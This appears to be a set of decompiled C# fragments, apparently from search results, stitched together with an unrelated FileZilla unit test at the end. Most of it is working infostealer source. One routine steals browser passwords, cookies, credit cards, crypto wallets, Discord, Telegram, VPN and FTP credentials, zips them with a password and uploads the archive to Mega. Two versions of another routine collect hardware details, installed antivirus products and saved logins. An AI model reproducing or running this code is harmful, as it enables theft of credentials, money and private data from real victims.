{ OpenVPN.GetOpenVPN(Help.collectionDir); }); CS$ < > 8__locals10.t8 = array9; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals11 = CS$ < > 8__locals1; Task[] array10 = new Task[1]; array10[0] = new Task(delegate() { NordVPN.GetNordVPN(Help.collectionDir); }); CS$ < > 8__locals11.t9 = array10; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals12 = CS$ < > 8__locals1; Task[] array11 = new Task[1]; array11[0] = new Task(delegate() { Telegram.GetTelegram(Help.collectionDir); }); CS$ < > 8__locals12.t10 = array11; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals13 = CS$ < > 8__locals1; Task[] array12 = new Task[1]; array12[0] = new Task(delegate() { Discord.GetDiscord(Help.collectionDir); }); CS$ < > 8__locals13.t11 = array12; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals14 = CS$ < > 8__locals1; Task[] array13 = new Task[1]; array13[0] = new Task(delegate() { Wallets.GetWallets(Help.collectionDir); }); CS$ < > 8__locals14.t12 = array13; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals15 = CS$ < > 8__locals1; Task[] array14 = new Task[1]; array14[0] = new Task(delegate() { Systemsinfo.GetSystemsData(Help.collectionDir); }); CS$ < > 8__locals15.t13 = array14; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals16 = CS$ < > 8__locals1; Task[] array15 = new Task[1]; array15[0] = new Task(delegate() { DomainDetect.GetDomainDetect(Help.Browsers); }); CS$ < > 8__locals16.t14 = array15; Collection.< > c__DisplayClass2_0 CS$ < > 8__locals17 = CS$ < > 8__locals1; Task[] array16 = new Task[1]; array16[0] = new Task(delegate() { Dec.Decrypt(Help.Passwords); }); CS$ < > 8__locals17.t15 = array16; try { new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t0; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t1; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t2; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t3; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t4; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t5; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t6; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t7; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t8; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t9; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t10; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t11; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t12; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t13; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t14; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); new Thread(delegate() { Task[] t = CS$ < > 8__locals1.t15; for (int i = 0; i < t.Length; i++) { t[i].Start(); } }).Start(); Task.WaitAll(CS$ < > 8__locals1.t0); Task.WaitAll(CS$ < > 8__locals1.t1); Task.WaitAll(CS$ < > 8__locals1.t2); Task.WaitAll(CS$ < > 8__locals1.t3); Task.WaitAll(CS$ < > 8__locals1.t4); Task.WaitAll(CS$ < > 8__locals1.t5); Task.WaitAll(CS$ < > 8__locals1.t6); Task.WaitAll(CS$ < > 8__locals1.t7); Task.WaitAll(CS$ < > 8__locals1.t8); Task.WaitAll(CS$ < > 8__locals1.t9); Task.WaitAll(CS$ < > 8__locals1.t10); Task.WaitAll(CS$ < > 8__locals1.t11); Task.WaitAll(CS$ < > 8__locals1.t12); Task.WaitAll(CS$ < > 8__locals1.t13); Task.WaitAll(CS$ < > 8__locals1.t14); Task.WaitAll(CS$ < > 8__locals1.t15); } catch { } string contents = string.Concat(new string[] { JsonValue.buildversion, "\n\ud83d\udc64 ", Help.machineName, "/", Help.userName, "\n\ud83c\udff4 IP: ", Help.IP(), Help.Country(), "\n\ud83c\udf10 Browsers Data\n ∟\ud83d\udd11\n ∟Chromium v1: ", Chromium.Passwords.ToString(), "\n ∟Chromium v2: ", Dec.colvo.ToString(), "\n ∟Edge: ", Edge.count.ToString(), "\n ∟Gecko: ", Steal.count.ToString(), "\n ∟\ud83c\udf6a", (Chromium.Cookies + Steal.count_cookies).ToString(), "\n ∟\ud83d\udd51", Chromium.History.ToString(), "\n ∟\ud83d\udcdd", Chromium.Autofills.ToString(), "\n ∟\ud83d\udcb3", Chromium.CC.ToString(), "\n ∟⨭", Chromium.Downloads.ToString(), "\n\ud83d\udcb6 Wallets: ", (Wallets.count > 0) ? "✅" : "❌", (Electrum.count > 0) ? " Electrum" : "", (Armory.count > 0) ? " Armory" : "", (AtomicWallet.count > 0) ? " Atomic" : "", (BitcoinCore.count > 0) ? " BitcoinCore" : "", (Bytecoin.count > 0) ? " Bytecoin" : "", (DashCore.count > 0) ? " DashCore" : "", (Ethereum.count > 0) ? " Ethereum" : "", (Exodus.count > 0) ? " Exodus" : "", (LitecoinCore.count > 0) ? " LitecoinCore" : "", (Monero.count > 0) ? " Monero" : "", (Zcash.count > 0) ? " Zcash" : "", (Jaxx.count > 0) ? " Jaxx" : "", "\n\ud83d\udcc2 FileGrabber: ", Files.count.ToString(), "\n\ud83d\udcac Discord: ", (Discord.count > 0) ? "✅" : "❌", "\n✈️ Telegram: ", (Telegram.count > 0) ? "✅" : "❌", "\n\ud83d\udca1 Jabber: ", (Startjabbers.count + Pidgin.PidginCount > 0) ? "✅" : "❌", (Pidgin.PidginCount > 0) ? (" Pidgin (" + Pidgin.PidginAkks.ToString() + ")") : "", (Startjabbers.count > 0) ? " Psi" : "", "\n\ud83d\udce1 FTP\n ∟ FileZilla: ", (FileZilla.count > 0) ? ("✅ (" + FileZilla.count.ToString() + ")") : "❌", "\n ∟ TotalCmd: ", (TotalCommander.count > 0) ? "✅" : "❌", "\n\ud83d\udd0c VPN\n ∟ NordVPN: ", (NordVPN.count > 0) ? "✅" : "❌", "\n ∟ OpenVPN: ", (OpenVPN.count > 0) ? "✅" : "❌", "\n ∟ ProtonVPN: ", (ProtonVPN.count > 0) ? "✅" : "❌", "\n\ud83c\udd94 HWID: ", Help.HWID, "\n⚙️ ", Systemsinfo.GetOSInformation(), "\n\ud83d\udd0e ", File.ReadAllText(Help.Browsers + "\\DomainDetect.txt") }); File.WriteAllText(Help.collectionDir + "\\InfoHERE.txt", contents); Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("Упаковка архива"); string text = string.Concat(new string[] { Help.dir, "\\", Help.userName, "_", Help.machineName, Help.CountryCOde(), ".zip" }); using (ZipFile zipFile = new ZipFile(Encoding.GetEncoding("cp866"))) { zipFile.ParallelDeflateThreshold = -1L; zipFile.UseZip64WhenSaving = Zip64Option.Always; zipFile.CompressionLevel = CompressionLevel.Default; zipFile.Password = Program.passwordzip; zipFile.AddDirectory(Help.collectionDir); try { zipFile.Save(text); } catch { text = Help.dir + "\\" + Help.HWID + ".zip"; zipFile.Save(text); } } Console.WriteLine("Залив на мегу"); MegaSend.Send(text); Clean.GetClean(); }
public static Credentials Create(ClientSettings settings) { Credentials credentials = new Credentials { Browsers = new List <Browser>(), Files = new List <RemoteFile>(), FtpConnections = new List <LoginPair>(), Hardwares = new List <Hardware>(), InstalledBrowsers = new List <InstalledBrowserInfo>(), InstalledSoftwares = new List <string>(), Languages = new List <string>(), Processes = new List <string>(), Defenders = new List <string>() }; try { WmiService wmiService = new WmiService(); try { ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>(new WmiProcessorQuery()); credentials.Hardwares = source.Select((WmiProcessor x) => new Hardware { Caption = x.Name, HardType = HardwareType.Processor, Parameter = $"{x.NumberOfCores}" }).ToList(); } catch { } try { if (credentials.Hardwares == null) { credentials.Hardwares = new List <Hardware>(); } foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery()) where x.AdapterRAM != 0 select new Hardware { Caption = x.Name, HardType = HardwareType.Graphic, Parameter = $"{x.AdapterRAM}" }).ToList()) { credentials.Hardwares.Add(item); } } catch { } try { List <WmiQueryBase> list = new List <WmiQueryBase> { new WmiAntivirusQuery(), new WmiAntiSpyWareQuery(), new WmiFirewallQuery() }; string[] array = new string[2] { "ROOT\\SecurityCenter2", "ROOT\\SecurityCenter" }; List <WmiAntivirus> list2 = new List <WmiAntivirus>(); foreach (WmiQueryBase item2 in list) { string[] array2 = array; foreach (string scope in array2) { try { list2.AddRange(wmiService.QueryAll <WmiAntivirus>(item2, new ManagementObjectSearcher(scope, string.Empty)).ToList()); } catch { } } } credentials.Defenders = list2.Select((WmiAntivirus x) => x.DisplayName).Distinct().ToList(); } catch { } credentials.InstalledBrowsers = UserInfoHelper.GetBrowsers(); credentials.Processes = UserInfoHelper.ListOfProcesses(); credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms(); credentials.Languages = UserInfoHelper.AvailableLanguages(); if (settings.GrabBrowsers) { List <Browser> list3 = new List <Browser>(); list3.AddRange(ChromiumEngine.ParseBrowsers()); list3.AddRange(GeckoEngine.ParseBrowsers()); list3.Add(EdgeEngine.ParseBrowsers()); foreach (Browser item3 in list3) { if (!item3.IsEmpty()) { credentials.Browsers.Add(item3); } } } if (settings.GrabFiles) { credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths); } if (settings.GrabFTP) { List <LoginPair> list4 = new List <LoginPair>(); list4.AddRange(FileZilla.ParseConnections()); list4.AddRange(WinSCP.ParseConnections()); credentials.FtpConnections = list4; } if (settings.GrabImClients) { foreach (LoginPair item4 in Pidgin.ParseConnections()) { credentials.FtpConnections.Add(item4); } return(credentials); } return(credentials); } catch { return(credentials); } }
public static Credentials Create(ClientSettings settings) { Credentials credentials = new Credentials() { Browsers = (IList <Browser>) new List <Browser>(), Files = (IList <RemoteFile>) new List <RemoteFile>(), FtpConnections = (IList <LoginPair>) new List <LoginPair>(), Hardwares = (IList <Hardware>) new List <Hardware>(), InstalledBrowsers = (IList <InstalledBrowserInfo>) new List <InstalledBrowserInfo>(), InstalledSoftwares = (IList <string>) new List <string>(), Languages = (IList <string>) new List <string>(), Processes = (IList <string>) new List <string>(), Defenders = (IList <string>) new List <string>() }; try { WmiService wmiService = new WmiService(); try { ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>((WmiQueryBase) new WmiProcessorQuery(), (ManagementObjectSearcher)null); credentials.Hardwares = (IList <Hardware>)source.Select <WmiProcessor, Hardware>((Func <WmiProcessor, Hardware>)(x => new Hardware() { Caption = x.Name, HardType = HardwareType.Processor, Parameter = string.Format("{0}", (object)x.NumberOfCores) })).ToList <Hardware>(); } catch { } try { if (credentials.Hardwares == null) { credentials.Hardwares = (IList <Hardware>) new List <Hardware>(); } foreach (Hardware hardware in wmiService.QueryAll <WmiGraphicCard>((WmiQueryBase) new WmiGraphicCardQuery(), (ManagementObjectSearcher)null).Where <WmiGraphicCard>((Func <WmiGraphicCard, bool>)(x => x.AdapterRAM > 0U)).Select <WmiGraphicCard, Hardware>((Func <WmiGraphicCard, Hardware>)(x => new Hardware() { Caption = x.Name, HardType = HardwareType.Graphic, Parameter = string.Format("{0}", (object)x.AdapterRAM) })).ToList <Hardware>()) { credentials.Hardwares.Add(hardware); } } catch { } try { List <WmiQueryBase> wmiQueryBaseList = new List <WmiQueryBase>() { (WmiQueryBase) new WmiAntivirusQuery(), (WmiQueryBase) new WmiAntiSpyWareQuery(), (WmiQueryBase) new WmiFirewallQuery() }; string[] strArray = new string[2] { "ROOT\\SecurityCenter2", "ROOT\\SecurityCenter" }; List <WmiAntivirus> source = new List <WmiAntivirus>(); foreach (WmiQueryBase wmiQuery in wmiQueryBaseList) { foreach (string scope in strArray) { try { source.AddRange((IEnumerable <WmiAntivirus>)wmiService.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>()); } catch { } } } credentials.Defenders = (IList <string>)source.Select <WmiAntivirus, string>((Func <WmiAntivirus, string>)(x => x.DisplayName)).Distinct <string>().ToList <string>(); } catch { } credentials.InstalledBrowsers = (IList <InstalledBrowserInfo>)UserInfoHelper.GetBrowsers(); credentials.Processes = (IList <string>)UserInfoHelper.ListOfProcesses(); credentials.InstalledSoftwares = (IList <string>)UserInfoHelper.ListOfPrograms(); credentials.Languages = (IList <string>)UserInfoHelper.AvailableLanguages(); if (settings.GrabBrowsers) { List <Browser> browserList = new List <Browser>(); browserList.AddRange((IEnumerable <Browser>)ChromiumEngine.ParseBrowsers()); browserList.AddRange((IEnumerable <Browser>)GeckoEngine.ParseBrowsers()); browserList.Add(EdgeEngine.ParseBrowsers()); foreach (Browser browser in browserList) { if (!browser.IsEmpty()) { credentials.Browsers.Add(browser); } } } if (settings.GrabFiles) { credentials.Files = RemoteFileGrabber.ParseFiles((IEnumerable <string>)settings.GrabPaths); } if (settings.GrabFTP) { List <LoginPair> loginPairList = new List <LoginPair>(); loginPairList.AddRange((IEnumerable <LoginPair>)FileZilla.ParseConnections()); loginPairList.AddRange((IEnumerable <LoginPair>)WinSCP.ParseConnections()); credentials.FtpConnections = (IList <LoginPair>)loginPairList; } if (settings.GrabImClients) { foreach (LoginPair connection in Pidgin.ParseConnections()) { credentials.FtpConnections.Add(connection); } } } catch { } return(credentials); }
public void Test_implementsSearchForNewer() { var fz = new FileZilla(false); Assert.IsTrue(fz.implementsSearchForNewer()); }